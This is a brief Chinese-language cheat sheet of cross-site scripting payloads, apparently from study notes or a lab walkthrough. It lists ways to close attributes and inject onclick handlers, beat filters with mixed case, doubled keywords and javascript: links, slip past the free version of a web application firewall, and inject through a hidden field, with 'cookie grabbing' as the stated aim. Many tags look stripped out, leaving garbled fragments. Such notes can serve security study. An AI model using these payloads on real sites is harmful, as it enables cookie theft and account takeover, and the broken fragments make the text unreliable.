弹窗获取cookie “>
# 闭合语句弹窗获得cookie 'onclick='alert(1) onclisk事件弹窗 "onclick="alert(1)" 看源码熟悉规则,符号限制 " Onclick="alert(1) 大小写转换 " oonnclick="alert(1) 绕过一次性的过滤 ”>
/ 超链接形式 ">
ok 能绕过免费版本的安全狗 ">
大小写 ">
alert(1)
双重书写 javascript:alert(1) 源码转义绕过 1
大小写
ipt>alert(1)
ipt>
标签过滤
Clickme
Clickme 如果没有数据被过滤,插入javascript协议看看
&t_sort="type="text"onclick="alert(1) 显示隐藏文本框,看源码,输入源码验证